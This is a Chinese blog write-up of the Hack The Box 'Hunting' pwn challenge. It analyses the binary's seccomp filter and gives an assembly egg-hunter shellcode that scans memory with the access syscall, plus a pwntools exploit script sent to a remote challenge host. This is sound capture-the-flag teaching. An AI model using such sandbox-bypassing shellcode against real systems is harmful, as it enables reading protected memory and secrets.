HTB-hunting-md

最新推荐文章于 2024-07-20 22:27:15 发布
最新推荐文章于 2024-07-20 22:27:15 发布
阅读量341 收藏 6
点赞数 10
文章标签: 安全 c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73373164/article/details/136590704
版权

title: HTB-hunting
date: 2023-12-13 15:18:01
categories: HTB
tags: PWN

HTB-hunting

这是一道手写shellcode题目

    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments

开启了PIE地址随机化

使用strings

tdH
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
strcpy
exit
srand
perror
signal
mmap
prctl
memset
read
alarm
close
open
__cxa_finalize
__libc_start_main
GLIBC_2.1.3
GLIBC_2.0
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
[^_]
prctl(PR_SET_NO_NEW_PRIVS)
prctl(PR_SET_SECCOMP)
/dev/urandom
9*2$"
HTB{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
.shstrtab
.interp
.note.gnu.build-id
.note.gnu.property
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

可以看到里面是有个HTB{xxx}的信息

./hunting运行尝试

发现无论输入任何数都显示

Segmentation fault

拖入ida32查看

没有显示main函数,只有自己找,找到如下代码可以判断为主函数

int sub_1460()
{
  int v1; // [esp-10h] [ebp-24h]
  int v2; // [esp-Ch] [ebp-20h]
  int v3; // [esp-8h] [ebp-1Ch]
  int v4; // [esp-4h] [ebp-18h]
  void *buf; // [esp+0h] [ebp-14h]
  char *dest; // [esp+4h] [ebp-10h]
  void *addr; // [esp+8h] [ebp-Ch]

  addr = (void *)sub_13D0();
  signal(14, (__sighandler_t)&exit);
  alarm(0xAu);
  dest = (char *)mmap(addr, 0x1000u, 3, 49, -1, 0);
  if ( dest == (char *)-1 )
    sub_1120(-1, v1, v2, v3);
  strcpy(dest, aHtbXxxxxxxxxxx);
  memset(aHtbXxxxxxxxxxx, 0, sizeof(aHtbXxxxxxxxxxx));
  sub_133D();
  buf = mmap(0, 0x1000u, 7, 33, -1, 0);
  read(0, buf, 0x3Cu);
  ((void (__stdcall *)(int, void *, _DWORD))buf)(v4, buf, 0);
  return 0;
}

这个代码使用了mmap(addr, 0x1000u, 3, 49, -1, 0);请求了0x1000内存给了dest以及buf

并且将strcpy(dest, aHtbXxxxxxxxxxx);我们需要的flag拷贝到了dest内存中

然后在使用了meset函数给flag之前的内存地址清零

read(0, buf, 0x3Cu);我们现在还有0x3c的内存可以利用

还调用了sub_13D0

int sub_13D0()
{
  unsigned int buf; // [esp+0h] [ebp-18h] BYREF
  int fd; // [esp+8h] [ebp-10h]
  int i; // [esp+Ch] [ebp-Ch]

  fd = open("/dev/urandom", 0);
  read(fd, &buf, 8u);
  close(fd);
  srand(buf);
  for ( i = 0; i <= 1610612735; i = rand() << 16 )
    ;
  return i;
}

利用写入的buf当作srand并且利用i来测试随机数

在使用seccomp-tools dump ./hunting

└─# seccomp-tools dump ./hunting
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x20 0x00 0x00 0x00000000  A = sys_number
 0002: 0x35 0x0a 0x00 0x40000000  if (A >= 0x40000000) goto 0013
 0003: 0x15 0x09 0x00 0x0000000b  if (A == execve) goto 0013
 0004: 0x15 0x08 0x00 0x00000166  if (A == execveat) goto 0013
 0005: 0x15 0x07 0x00 0x00000127  if (A == openat) goto 0013
 0006: 0x15 0x06 0x00 0x00000005  if (A == open) goto 0013
 0007: 0x15 0x05 0x00 0x00000006  if (A == close) goto 0013
 0008: 0x15 0x04 0x00 0x00000008  if (A == creat) goto 0013
 0009: 0x15 0x03 0x00 0x00000056  if (A == uselib) goto 0013
 0010: 0x15 0x02 0x00 0x00000002  if (A == fork) goto 0013
 0011: 0x15 0x01 0x00 0x000000be  if (A == vfork) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x06 0x00 0x00 0x00000000  return KILL

把execve以及open,close给禁用了,表示我们无法使用getshell,orw

这个时候就得利用c里面的函数去找flag的地址了

比如access可以来判断文件名是否存在并且判断内存地址是否存在

利用语法为

access(const char *filename,int mode);
当mode 为0 时,判断是否存在。

当mode 为1时,判断是否有执行权限。

当mode 为2时,判断是否有写权限。

当mode 为3时,判断是否有读权限。

filename参数可以是文件名也能是内存地址

利用access函数以0x1000为一个单位来慢慢遍历

用c伪代码表达为

for (uint32_t address = 0x60000000; address < 0x7fffffff; address += 0x1000)
{

        if (access(address + i +4) == EFAULT)
            break;
        write(1, address, 0x26);
        exit(0);
        
    
}

使用汇编表达就是

mov edx,0x5fffffff;
xor ecx,ecx;
notaccess:
or dx,0xfff;
inc edx;
mov eax,0x21;
lea  ebx,[edx+4]
int 0x80
cmp eax,0xfffffff2;
jz  notaccess;
mov eax,0x04;
mov ebx,1;
mov ecx,edx;
mov edx,0x26
int 0x80
exp
from pwn import *

elf=ELF('./hunting')
context.log_level='debug'

p=remote('167.99.82.136',32646)
payload="""
mov edx,0x5fffffff;
xor ecx,ecx;
notaccess:
or dx,0xfff;
inc edx;
mov eax,0x21;
lea  ebx,[edx+4]
int 0x80
cmp eax,0xfffffff2;
jz  notaccess;

mov eax,0x04;
mov ebx,1;
mov ecx,edx;
mov edx,0x26
int 0x80
"""
p.sendline(asm(payload))
p.interactive()

成功得到flag

借鉴了大佬wp[Hunting— HTB PWN challenge | lexsd6’s home](https://lexsd6.github.io/2021/11/02/PWN Hunting challenge — HTB/)

c0iq
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 555
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 590
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 813
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 820
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 842
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
防火墙--内容安全
最新发布
banliyaoguai的博客
07-20 370
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
数据库安全审计系统:筑牢数据安全防线 提高数据资产安全
2401_82472120的博客
07-17 449
其可以监控和审计用户对数据库中的数据库表、视图、序列、包、存储过程、函数、库、索引、同义词、快照、触发器等的访问、创建、修改和删除等,分析的内容可以精确到SQL操作语句级别。另外,它还可以根据设置的规则,智能判断出违规操作数据库的行为,并对违规行为进行记录、报警。通过对用户访问数据库行为的记录、分析和汇报,来帮助用户事后生成合规报告、事故追根溯源,同时通过大数据搜索技术提供高效查询审计报告,定位事件原因,以便日后查询、分析、过滤,实现加强内外部数据库网络行为的监控与审计,提高数据资产安全
响应“一机两用”政策号召 提高政务内外网安全
Canon_YK的博客
07-17 911
随着一机两用政策的实施,即政府部门内部网络终端在特定情况下需同时连接政务内外网,如何在保证工作效率的同时,确保网络安全和数据安全,成为摆在面前的重要课题。未来,随着技术的不断发展和完善,沙箱技术将在政务内外网安全中发挥更加重要的作用。深信达的SDC沙箱技术已经和多个政企单位合作,高效便捷的沙箱技术已经大大提升了政务机关的内网安全,为政务机关业务的开展提供了强有力的安全保障。SDC沙箱技术能够对隔离环境中的网络行为进行实时监控和审计,包括网络连接的建立、数据的传输、应用程序的运行等。
保障低压设备安全!中国星坤连接器精密工艺解析!
weixin_50506145的博客
07-16 541
随着技术的发展,对连接器的需求也在不断提升,特别是在低电压应用领域。中国星坤最新推出的低压连接器,以其精密性和安全性,为低电压设备提供了一个可靠的连接解决方案。中国星坤的低压连接器,以其卓越的性能和广泛的应用前景,为低电压设备的安全稳定运行提供了有力保障。随着技术的不断进步和市场需求的增长,低压连接器将在更多领域展现其独特的价值,成为连接现代电子世界的可靠伙伴。:在医疗领域,低压连接器用于连接各种便携式医疗监测设备,确保数据传输的准确性和设备的稳定性。:由于设计简洁,连接器的维护和更换变得简单快捷。
安全防御:防火墙基本模块
zhugedali_的博客
07-16 865
它会检查每个传入和传出的数据包的头部信息,包括源 IP 地址、目的 IP 地址、源端口、目的端口、协议类型(如 TCP、UDP、ICMP 等)以及数据包的标志位等。如果允许,防火墙会创建一个状态表项来记录该连接的状态,包括连接的方向、数据包的序列号等。- IDS/IPS 模块通常使用多种检测技术,包括基于特征的检测、基于异常的检测和基于协议分析的检测等,以提高检测的准确性和有效性。- 日志模块负责记录防火墙处理的所有活动和事件,包括数据包的过滤决策、连接的建立和终止、管理员的操作等详细信息。
游戏外挂的技术实现与五年脚本开发经验分享
m0_62996549的博客
07-19 533
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。
【Java安全】基础配置篇-01
jayq1的博客
07-19 1074
Java安全基础学习篇
安全防御---防火墙综合实验3
难~赴
07-16 533
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW113,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M14,销售部保证email应用在办公时间至少可以使用10M的带宽,每个人至少1M15,移动链路采用的是100M的带宽,要求游客区用户仅能占用50M,并且基于在线地址进行动态均分。
F5理念左移,实现API安全的全生命周期管理
hanniuniu13的博客
07-17 306
作为F5安全产品组合的一部分(该产品组合包含大型硬件、软件、SaaS和托管服务),不仅提供了业界领先的应用交付能力,还提供了适用于任意环境下的分布式应用和API的应用安全能力。F5的应用安全功能恰好能解决这一痛点,不仅为企业提供全方位的API安全防护和控制,还与AWS、Azure、阿里云等集成,为这些环境提供更好的业务可靠性和业务应用层面的安全性,采购的模型从以往永久的采购模型变成了可订阅的销售模型,使得选用F5的时候更灵活。面对如此复杂的形势,F5安全理念正在左移,以应对API安全威胁。
CVE-2023-4016
08-17
- *1* *2* [HTB HARD 靶机 Cerberus WriteUp](https://blog.csdn.net/qq_58869808/article/details/129786875)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值